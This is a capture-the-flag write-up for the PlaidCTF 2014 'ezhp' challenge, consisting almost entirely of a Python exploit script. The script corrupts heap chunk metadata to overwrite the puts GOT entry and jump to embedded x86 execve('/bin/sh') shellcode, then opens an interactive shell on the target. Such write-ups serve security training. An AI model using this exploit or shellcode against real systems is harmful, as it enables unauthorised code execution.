write up of ezhp

ezhp.py

#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket, struct, re, telnetlib
import time

puts_got = 0x804a008

def sock(remoteip, remoteport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    f = s.makefile('rw', bufsize=0)
    return s, f

def read_until(f, delim='\n'):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data

def p(a):
    return struct.pack("<I",a)

def shell(s):
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()

s, f = sock('localhost', 12345)

# raw_input('debug')

# x86/linux/exec: 24 bytes
shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
    "\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

s.send('1\n')
s.send('10\n')
s.send('1\n')
s.send('24\n')
s.send('1\n')
s.send('10\n')

s.send('3\n') #change
s.send('0\n') #id
s.send('16\n') #size

time.sleep(0.5)
payload0 = ''
payload0 += 'a'*12
# payload0 += p(0xeb10)
payload0 += '\xeb\x10\x90\x90'
s.send(payload0+'\n')

s.send('3\n') #change
s.send('1\n') #id
s.send('44\n') #size

payload = ''
payload += (36-len(shellcode))*'\x90'
payload += shellcode
payload += p(0x19)
payload += p(puts_got - 8)
time.sleep(0.5)
s.send(payload+'\n')

s.send('2\n') #remove
s.send('2\n') #id
shell(s)

http://shell-storm.org/repo/CTF/PlaidCTF-2014/Pwnables/ezhp/